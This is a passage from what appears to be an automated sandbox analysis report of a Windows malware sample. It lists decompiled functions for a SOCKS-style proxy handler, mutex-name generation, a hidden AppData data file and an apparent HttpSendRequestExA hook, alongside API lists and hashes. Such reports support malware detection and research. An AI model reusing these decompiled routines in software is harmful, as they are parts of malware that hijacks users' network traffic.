    					} else {
    						if(_t17 == 0x3e5) {
    							if(GetOverlappedResult(_t22,  &_v28, _t28, 1) != 0) {
    								L7:
    								_v5 = 1;
    							} else {
    								if(GetLastError() == 0x26) {
    									goto L6;
    								}
    							}
    						}
    					}
    				} else {
    					_v5 = 1;
    				}
    				return _v5;
    			}









    APIs
    • ReadFile.KERNEL32(?,?,?,?,?,?,00000000,00000014), ref: 012BD29E
    • GetLastError.KERNEL32(?,?,?,?,?,?,?,00000000,00000014), ref: 012BD2B5
    • GetOverlappedResult.KERNEL32(?,?,?,00000001,?,?,?,?,?,?,?,00000000,00000014), ref: 012BD2CB
    • GetLastError.KERNEL32(?,?,?,00000001,?,?,?,?,?,?,?,00000000,00000014), ref: 012BD2D5
    Memory Dump Source
    • Source File: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true
    • Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd
    Similarity
    • API ID: ErrorLast$FileOverlappedReadResult
    • String ID:
    • API String ID: 1381625491-0
    • Opcode ID: 53cff3a65e7adb7d47806f23e3b400c63a2bbba2f89dd3d41115812c10820c1d
    • Instruction ID: 0fff3050881fc811cb342317b986b9dfa891440e7ee54816ae7281d745b39fd3
    • Opcode Fuzzy Hash: 53cff3a65e7adb7d47806f23e3b400c63a2bbba2f89dd3d41115812c10820c1d
    • Instruction Fuzzy Hash: AF01F93191428DABEB219AE8DCC4BEE7FBCDF15354F000056F600E6142D671D58187B1
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 77%
    			E012B9502(WCHAR* __ecx, void* __edx, long _a4) {
    				char _v5;
    				long _v12;
    				void* _t19;
    				void* _t22;
    
    				_push(__ecx);
    				_push(__ecx);
    				_t19 = __edx;
    				_v5 = 0;
    				_t22 = CreateFileW(__ecx, 0x40000000, 1, 0, 4, 0x80, 0);
    				if(_t22 != 0xffffffff) {
    					SetFilePointer(_t22, 0, 0, 2);
    					if(_t19 == 0 || _a4 == 0 || WriteFile(_t22, _t19, _a4,  &_v12, 0) != 0) {
    						_v5 = 1;
    					}
    					CloseHandle(_t22);
    				}
    				return _v5;
    			}








    APIs
    • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000004,00000080,00000000), ref: 012B9522
    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,40000000,00000001,00000000,00000004,00000080,00000000), ref: 012B9534
    • WriteFile.KERNEL32(00000000,?,?,?,00000000,?,40000000,00000001,00000000,00000004,00000080,00000000), ref: 012B954D
    • CloseHandle.KERNEL32(00000000,?,40000000,00000001,00000000,00000004,00000080,00000000), ref: 012B955C
    Memory Dump Source
    • Source File: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true
    • Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd
    Similarity
    • API ID: File$CloseCreateHandlePointerWrite
    • String ID:
    • API String ID: 3604237281-0
    • Opcode ID: ecd4bf42ed413c568336b6b7b2d8a07f984095059f607334dfd8384b720c8030
    • Instruction ID: b86307816fd593bcb08bf65a6a92fac9a7167f095df5725990d905fdc9dfd1c5
    • Opcode Fuzzy Hash: ecd4bf42ed413c568336b6b7b2d8a07f984095059f607334dfd8384b720c8030
    • Instruction Fuzzy Hash: 86F0D1B25511197EFB204AACECCCFEF3E6CDB41398F004124FB51A5081D6704D498375
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E012C2927(void* __ebx, void* __edi, void* __esi) {
    				void* _t1;
    				void* _t3;
    				long _t9;
    
    				L012B1654(_t1);
    				_t3 = L012B1780(0x19367401, 1);
    				_t25 = _t3;
    				if(_t3 != 0) {
    					if(L012B150A() == 0) {
    						L7:
    						L012B1492(_t25);
    						return 0;
    					}
    					SetThreadPriority(GetCurrentThread(), 0xfffffff1);
    					_t9 = WaitForSingleObject( *0x12dcc54, 0x1388);
    					while(_t9 == 0x102) {
    						L012B17CB();
    						_t9 = WaitForSingleObject( *0x12dcc54, 0x1388);
    					}
    					goto L7;
    				}
    				return _t3 + 1;
    			}







    APIs
    • GetCurrentThread.KERNEL32 ref: 012C2952
    • SetThreadPriority.KERNEL32(00000000), ref: 012C2959
    • WaitForSingleObject.KERNEL32(00001388), ref: 012C2971
    Memory Dump Source
    • Source File: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true
    • Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd
    Similarity
    • API ID: Thread$CurrentObjectPrioritySingleWait
    • String ID:
    • API String ID: 991781811-0
    • Opcode ID: 48d74a8af917717e9e02f578c6629a9bb33a14e580a4bcc47e3a100e8ae7c4c0
    • Instruction ID: 87d03e25190b926321ba1b59d1bd1631fed9efced5570a73e32e3dad9b3797aa
    • Opcode Fuzzy Hash: 48d74a8af917717e9e02f578c6629a9bb33a14e580a4bcc47e3a100e8ae7c4c0
    • Instruction Fuzzy Hash: 1FF0243153010A9AA62237ACBCD89FA7B5DDBA0BE0724022AEB0683145DD214810C3A0
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E012B4E45(void* __ecx) {
    				intOrPtr _v20;
    				void* _v32;
    				signed int _t5;
    				signed int _t6;
    				int _t8;
    				void* _t12;
    				int _t14;
    				void* _t15;
    
    				_t14 = 0;
    				_t12 = __ecx;
    				_t5 = CreateToolhelp32Snapshot(4, 0);
    				_t15 = _t5;
    				_t6 = _t5 | 0xffffffff;
    				if(_t15 != _t6) {
    					_v32 = 0x1c;
    					_t8 = Thread32First(_t15,  &_v32);
    					while(_t8 != 0) {
    						if(_v20 == _t12) {
    							_t14 = _t14 + 1;
    						}
    						_t8 = Thread32Next(_t15,  &_v32);
    					}
    					CloseHandle(_t15);
    					return _t14;
    				}
    				return _t6;
    			}












    APIs
    • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 012B4E55
    • Thread32First.KERNEL32 ref: 012B4E6F
    • Thread32Next.KERNEL32 ref: 012B4E81
    • CloseHandle.KERNEL32(00000000,00000000,0000001C,00000000,?), ref: 012B4E8B
    Memory Dump Source
    • Source File: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true
    • Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd
    Similarity
    • API ID: Thread32$CloseCreateFirstHandleNextSnapshotToolhelp32
    • String ID:
    • API String ID: 3643885135-0
    • Opcode ID: 02eae7b6a0a1cb5b38a446be1c9061bb6a1818d37bc3b58915983c7c54284c90
    • Instruction ID: 333a36956a3762661a80c9fa3a3a8e6a8537e2070b5501953b44bef1bbc48bf9
    • Opcode Fuzzy Hash: 02eae7b6a0a1cb5b38a446be1c9061bb6a1818d37bc3b58915983c7c54284c90
    • Instruction Fuzzy Hash: 5BF0AE71E10156A69B30B5FE9CC4DFF76ACDB853A4F000136E711D1082D774880586B1
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 88%
    			E012CA07E(char __ecx, void* __edx, void* __eflags) {
    				char _v5;
    				char _v9;
    				char _v16;
    				char _v20;
    				signed int _v24;
    				unsigned int _v29;
    				short _v31;
    				signed char _v32;
    				unsigned int _v44;
    				short _v46;
    				char _v48;
    				char _v304;
    				void* _t64;
    				signed int _t65;
    				short _t74;
    				void* _t76;
    				void* _t79;
    				void* _t81;
    				char _t84;
    				char _t94;
    				char* _t96;
    				char _t118;
    				void* _t133;
    				void* _t141;
    				intOrPtr _t142;
    				intOrPtr _t143;
    				void* _t147;
    				void* _t148;
    				intOrPtr _t149;
    				void* _t150;
    
    				_t141 = __edx;
    				_v16 = __ecx;
    				_v24 = 0 | L012B185C(__ecx) == 0x00000017;
    				_t64 = L012B19E7(_v16,  &_v32, 7, __edx);
    				if(_t64 == 0) {
    					return _t64;
    				} else {
    					while(1) {
    						_t65 = L012B19E7(_v16,  &_v5, 1, _t141);
    						if(_t65 == 0) {
    							break;
    						}
    						if(_v5 == 0) {
    							_t110 = _v29;
    							_v9 = 0x5a;
    							if(((_v29 & 0x00ff0000 | _v29 >> 0x00000010) >> 0x00000008 | (_t110 & 0x0000ff00 | _t110 << 0x00000010) << 0x00000008) - 1 > 0xfe) {
    								_t142 = 0;
    								L22:
    								_v5 = 1;
    								if(_v9 != 0x5a) {
    									L48:
    									_t65 = E012CA009(_v16, 0xffffffff, _v9, _v24) & 0xffffff00 | _t72 != 0x00000000;
    									L36:
    									L37:
    									return _t65;
    								}
    								_t133 = 0x10;
    								L012B19F6( &_v48, _t133);
    								_t74 = 2;
    								_v48 = _t74;
    								_t76 = (_v32 & 0x000000ff) - 1;
    								if(_t76 == 0) {
    									_v46 = _v31;
    									_v44 = _v29;
    									_t79 = L012B173F( &_v48);
    									_t146 = _t79;
    									if(_t79 != 0xffffffff) {
    										L012B17B2(_t146, 1);
    										_t81 = E012CA009(_v16, _t146, 0x5a, _v24);
    										if(_t81 != 1) {
    											if(_t81 != 0xffffffff) {
    												_v5 = 0;
    											} else {
    												_v9 = 0x5b;
    											}
    										} else {
    											_t81 = L012B108C(_v16, _t146);
    										}
    										L012B1B22(_t81, _t146);
    										if(_v5 != 1 || _v9 == 0x5a) {
    											L35:
    											_t65 = _v5;
    											goto L36;
    										} else {
    											goto L48;
    										}
    									}
    									L40:
    									_v9 = 0x5b;
    									goto L48;
    								}
    								if(_t76 != 1) {
    									goto L40;
    								}
    								_t84 = L012B187A( &_v48, 1);
    								_v20 = _t84;
    								if(_t84 == 0xffffffff) {
    									goto L40;
    								}
    								_t147 = E012CA009(_v16, _t84, 0x5a, _v24);
    								if(_t147 != 1) {
    									_t118 = _v20;
    									L32:
    									L012B1B22(_t85, _t118);
    									if(_t147 == 0xffffffff) {
    										goto L40;
    									}
    									if(_t147 != 1) {
    										_v5 = 0;
    									}
    									goto L35;
    								}
    								_t143 = L012B17D0( &_v20, 1, _t142, _t142, _t142,  &_v16, 1);
    								L012B1B22(_t88, _v20);
    								if(_t143 == 0xffffffff) {
    									goto L40;
    								}
    								L012B17B2(_t143, 1);
    								_t147 = E012CA009(_v16, _t143, 0x5a, _v24 | 0x00000002);
    								if(_t147 == 1) {
    									_t85 = L012B108C(_v16, _t143);
    								}
    								_t118 = _t143;
    								goto L32;
    							}
    							_t148 = 0;
    							while(L012B19E7(_v16,  &_v5, 1, _t141) != 0) {
    								_t94 = _v5;
    								 *((char*)(_t150 + _t148 - 0x12c)) = _t94;
    								if(_t94 == 0) {
    									_t142 = 0;
    									_t96 =  &_v304;
    									_v20 = 0;
    									__imp__getaddrinfo(_t96, 0, 0,  &_v20);
    									if(_t96 == 0) {
    										_t149 = _v20;
    										while(_t149 != _t142) {
    											if( *((intOrPtr*)(_t149 + 4)) == 2) {
    												L012B1947( &_v29,  *((intOrPtr*)(_t149 + 0x18)) + 4, 4);
    												L19:
    												__imp__freeaddrinfo(_v20);
    												if(_t149 != _t142) {
    													goto L22;
    												}
    												goto L12;
    											}
    											_t149 =  *((intOrPtr*)(_t149 + 0x1c));
    										}
    										goto L19;
    									}
    									L12:
    									_v9 = 0x5b;
    									goto L22;
    								}
    								_t148 = _t148 + 1;
    								if(_t148 <= 0xff) {
    									continue;
    								}
    								break;
    							}
    							_t65 = 0;
    							goto L36;
    						}
    					}
    					goto L37;
    				}
    			}


































    APIs
    • getaddrinfo.WS2_32(?,00000000,00000000,?), ref: 012CA150
    • freeaddrinfo.WS2_32(?,?,?,00000004,?,?,00000001,?,?,00000007), ref: 012CA189
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true
    • Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd
    Similarity
    • API ID: freeaddrinfogetaddrinfo
    • String ID: Z
    • API String ID: 1109861670-1505515367
    • Opcode ID: 928dedcafcab9bbe18a53678d98bb3d73f6b7a3bb9ceab53c3da3c3da0c22cab
    • Instruction ID: 708726f4776c55975d386a3b10e1ba4a29ed0789c7069bd5b01694e8ae0aaa3a
    • Opcode Fuzzy Hash: 928dedcafcab9bbe18a53678d98bb3d73f6b7a3bb9ceab53c3da3c3da0c22cab
    • Instruction Fuzzy Hash: 20713831D2016EAADF259AA8DC55AFEBB72AF81780F00836DD761B32D0F6714905C752
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 39%
    			E012BCC4E(void* __ecx, unsigned int __edx, void* __edi, intOrPtr _a8, intOrPtr _a12, signed char _a16) {
    				signed int _v14;
    				signed int _v16;
    				signed int _v20;
    				char _v280;
    				void* _t26;
    				signed int _t28;
    				intOrPtr _t29;
    				signed int* _t30;
    				void* _t31;
    				void* _t38;
    				char* _t44;
    				void* _t45;
    				void* _t46;
    				intOrPtr _t47;
    				signed int _t51;
    				void* _t52;
    
    				_t46 = __edi;
    				L012B1947( &_v20, __ecx, 0x10);
    				_v20 = _v20 ^ __edx;
    				_v16 = _v16 ^ __edx;
    				_v14 = _v14 ^ __edx >> 0x00000010;
    				_t38 = 0;
    				_t26 = 0;
    				do {
    					 *(_t52 + _t38 - 8) =  *(_t52 + _t38 - 8) ^  *(_t52 + _t26 + 8);
    					_t26 = _t26 + 1;
    					if(_t26 == 4) {
    						_t26 = 0;
    					}
    					_t38 = _t38 + 1;
    				} while (_t38 < 8);
    				if(_a12 != 0) {
    					_push(L012B1947( &_v280, _a12, 0x102));
    					_t45 = 0x10;
    					L012B1271( &_v20, _t45);
    				}
    				_t28 = _a16 & 0x000000ff;
    				if(_t28 == 0) {
    					L12:
    					_t29 = _a8;
    				} else {
    					_t31 = _t28 - 1;
    					if(_t31 == 0) {
    						_t44 = L"Local\\";
    						_push(6);
    						goto L11;
    					} else {
    						if(_t31 != 1) {
    							goto L12;
    						} else {
    							_t44 = L"Global\\";
    							_push(7);
    							L11:
    							_pop(_t51);
    							_push(_t46);
    							_t47 = _a8;
    							L012B164F(_t47, _t44, _t51);
    							_t29 = _t47 + _t51 * 2;
    						}
    					}
    				}
    				_t30 =  &_v20;
    				__imp__StringFromGUID2(_t30, _t29, 0x28);
    				return _t30;
    			}




















    APIs
    • StringFromGUID2.OLE32(00000000,?,00000028,?,?,?,00000010), ref: 012BCCEE
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true
    • Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd
    Similarity
    • API ID: FromString
    • String ID: Global\$Local\
    • API String ID: 1694596556-639276846
    • Opcode ID: b3461a6ab8590ed2f43d1b94d7a16a5b4376dcf1b4c1b2159adcca9891df8154
    • Instruction ID: 38619aae3d5f39c30ab51c04f676f182635a456fec91b45ed211860e0be405da
    • Opcode Fuzzy Hash: b3461a6ab8590ed2f43d1b94d7a16a5b4376dcf1b4c1b2159adcca9891df8154
    • Instruction Fuzzy Hash: 6B11EF3262014FA7EF14DBA8DC86BFF7769FB25754F048426EA12E6080D6B4A520C750
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 68%
    			E012C1246() {
    				int _t10;
    				void* _t11;
    				void* _t12;
    				signed int _t15;
    				void* _t21;
    				signed int _t26;
    				void* _t27;
    				void* _t29;
    				void* _t32;
    				void* _t34;
    				void* _t35;
    				void* _t37;
    
    				_t35 = _t37 - 0x74;
    				if(( *(_t35 + 0x7c) & 0x00000001) != 0) {
    					L9:
    					_t10 = 1;
    				} else {
    					_t11 = _t35 - 0x54;
    					__imp__SHGetFolderPathW(0, 0x1a, 0, 0, _t11, _t29, _t32);
    					if(_t11 != 0) {
    						_push(0);
    					} else {
    						_t26 = L"\\oemfpc.dat";
    						L012B101E(_t35 - 0x54, 0x16);
    						_t21 = 0x14;
    						_t34 = L012B1C17(_t21);
    						_t15 = L012B1168(_t35 - 0x54, _t26);
    						_t27 = _t34;
    						if((_t15 & _t26) != 0xffffffff) {
    							L012B12B7(_t35 - 0x54, _t27, 0x10);
    						} else {
    							L012B1028(0, _t27, 8, 8);
    							L012B14A1(_t35 - 0x54, _t34, 0x10);
    						}
    						_push(_t34);
    					}
    					_t12 = CreateEventW(0x12dc7c8, 1, 0, ??);
    					 *0x12dcc58 =  *0x12dcc58 | 0xffffffff;
    					 *0x12dcc54 = _t12;
    					if(_t12 != 0) {
    						goto L9;
    					} else {
    						_t10 = 0;
    					}
    				}
    				return _t10;
    			}
















    APIs
    • SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 012C1268
    • CreateEventW.KERNEL32(012DC7C8,00000001,00000000,00000000), ref: 012C12CB
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true
    • Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd
    Similarity
    • API ID: CreateEventFolderPath
    • String ID: \oemfpc.dat
    • API String ID: 210964451-2109668802
    • Opcode ID: fa2948eaff286f1aafd3575207976adca93a6545a2695c0bad05b839c6c0446e
    • Instruction ID: 472e1023396e4cfd4c910bd58ac5d8df27047be285c3f0868c92f42be8434ea1
    • Opcode Fuzzy Hash: fa2948eaff286f1aafd3575207976adca93a6545a2695c0bad05b839c6c0446e
    • Instruction Fuzzy Hash: 0E113A71B60294A2E730D6B5ED57FEF33A99BA2F10F20871CA752D60C5DAB44628C351
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E012C1803(void* __ecx, signed int __edx) {
    				char _v104;
    				void* _v154;
    				void* _v174;
    				void* _v194;
    				char _v592;
    				void* _t10;
    				int _t12;
    				void* _t15;
    				void* _t16;
    				void* _t17;
    				signed int _t24;
    				WCHAR* _t27;
    				WCHAR* _t28;
    
    				_t24 = __edx;
    				_t28 = __edx;
    				_t17 = __ecx;
    				 *__edx = 0;
    				L012B11AE( &_v592);
    				_t10 = _t17;
    				if(_t10 == 0) {
    					L6:
    					goto L7;
    				} else {
    					_t15 = _t10 - 1;
    					if(_t15 == 0) {
    						L7:
    						_t27 = 0x12dc7f0;
    						goto L8;
    					} else {
    						_t16 = _t15 - 1;
    						if(_t16 == 0) {
    							goto L6;
    						} else {
    							_t12 = _t16 - 1;
    							if(_t12 == 0) {
    								_t27 = L"SOFTWARE\\Microsoft";
    								L8:
    								_t12 = L012B1B5E(_t24 | 0xffffffff,  &_v104, 0x32);
    								if(_t12 != 0) {
    									_t12 = L012B1203(_t28, _t27,  &_v104);
    									if(_t12 == 0) {
    										L12:
    										 *_t28 = 0;
    										return 0;
    									}
    									if(_t17 == 0) {
    										_t12 = PathRenameExtensionW(_t28, L".dat");
    										if(_t12 == 0) {
    											goto L12;
    										}
    									}
    								}
    							}
    						}
    					}
    				}
    				return _t12;
    			}

















    APIs
    • PathRenameExtensionW.SHLWAPI(?,.dat,?,?,00000032), ref: 012C1880
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true
    • Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd
    Similarity
    • API ID: ExtensionPathRename
    • String ID: .dat$SOFTWARE\Microsoft
    • API String ID: 3337224433-47915998
    • Opcode ID: 0b66c22b232dd087f1a43fae9086fa87e301f51e60fc56b905efe37e52bac6a1
    • Instruction ID: 482f465987cb273ffe93980278e49c5aed4adc8587351a13ba00bda1cc39f15a
    • Opcode Fuzzy Hash: 0b66c22b232dd087f1a43fae9086fa87e301f51e60fc56b905efe37e52bac6a1
    • Instruction Fuzzy Hash: 40012D2173421696FB28DB6CDC927FB73A9DF50680F54036D8705D31C2FB60D965C615
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 88%
    			E012BE155(char __ecx, void* __edx, intOrPtr _a4) {
    				char _v524;
    				short _v1044;
    				void* _t13;
    				void* _t18;
    				void* _t25;
    				char _t26;
    				void* _t27;
    
    				_t18 = __edx;
    				_t26 = __ecx;
    				if(GetTempPathW(0xf6,  &_v1044) - 1 > 0xf5) {
    					L8:
    					return 0;
    				}
    				if(_t26 == 0) {
    					_t26 = L"tmp";
    				}
    				_t25 = 0;
    				while(1) {
    					_push(_t18);
    					_push(L012B122B());
    					_t13 = L012B1A8C( &_v524, 0x104, L"%s%08x.%s", _t26);
    					_t27 = _t27 + 0x18;
    					if(_t13 == 0xffffffff) {
    						goto L8;
    					}
    					if(L012B1203(_a4,  &_v1044,  &_v524) == 0 || L012B14A1(_a4, 0, 0) == 0) {
    						_t25 = _t25 + 1;
    						if(_t25 < 0x64) {
    							continue;
    						}
    						goto L8;
    					} else {
    						return 1;
    					}
    				}
    				goto L8;
    			}











    APIs
    • GetTempPathW.KERNEL32(000000F6,?), ref: 012BE171
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true
    • Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd
    Similarity
    • API ID: PathTemp
    • String ID: %s%08x.%s$tmp
    • API String ID: 2920410445-234517578
    • Opcode ID: 0a4828b5fc33f08f2ef998c832e50e46b936c7e6e2d22bfd3dcdfda4a3914b82
    • Instruction ID: 378cafef84bb688ae5d49143acaf77b547d910adbd5aae16246c3dbc8be3e952
    • Opcode Fuzzy Hash: 0a4828b5fc33f08f2ef998c832e50e46b936c7e6e2d22bfd3dcdfda4a3914b82
    • Instruction Fuzzy Hash: D80168B2A3022923DB20A628DCC5EEF3718CB413E8F014571AF15971C1D8B09D868790
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E012D1545(void* _a4, struct _GOPHER_FIND_DATAA _a8, struct _GOPHER_FIND_DATAA _a12, long _a16, long _a20) {
    				char _v20;
    				char _v24;
    				long _v32;
    				char* _v36;
    				char _v44;
    				intOrPtr _v48;
    				void* _t42;
    
    				if((L012B150A() & 0x000000ff) == 0) {
    					L9:
    					return HttpSendRequestExA(_a4, _a8, _a12, _a16, _a20);
    				}
    				_t44 = _a8;
    				if(_a8 != 0) {
    					L012B1947( &_v44, _a8, 0x28);
    					__eflags = _v32;
    					if(__eflags != 0) {
    						__eflags = _v36;
    						if(__eflags != 0) {
    							HttpAddRequestHeadersA(_a4, _v36, _v32, 0xa0000000);
    							_v36 = _v36 & 0x00000000;
    							_t13 =  &_v32;
    							 *_t13 = _v32 & 0x00000000;
    							__eflags =  *_t13;
    						}
    					}
    				} else {
    					_t42 = 0x28;
    					L012B19F6( &_v44, _t42);
    					_v44 = 0x28;
    				}
    				_v48 = E012D0CDB(_a4,  &_v24, _t44,  &_v20);
    				if(_v48 == 0xffffffff) {
    					_a8 =  &_v44;
    					goto L9;
    				} else {
    					return _v48;
    				}
    			}











    APIs
    • HttpAddRequestHeadersA.WININET(?,00000000,00000000,A0000000), ref: 012D1599
    • HttpSendRequestExA.WININET(?,?,?,?,?), ref: 012D15D9
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true
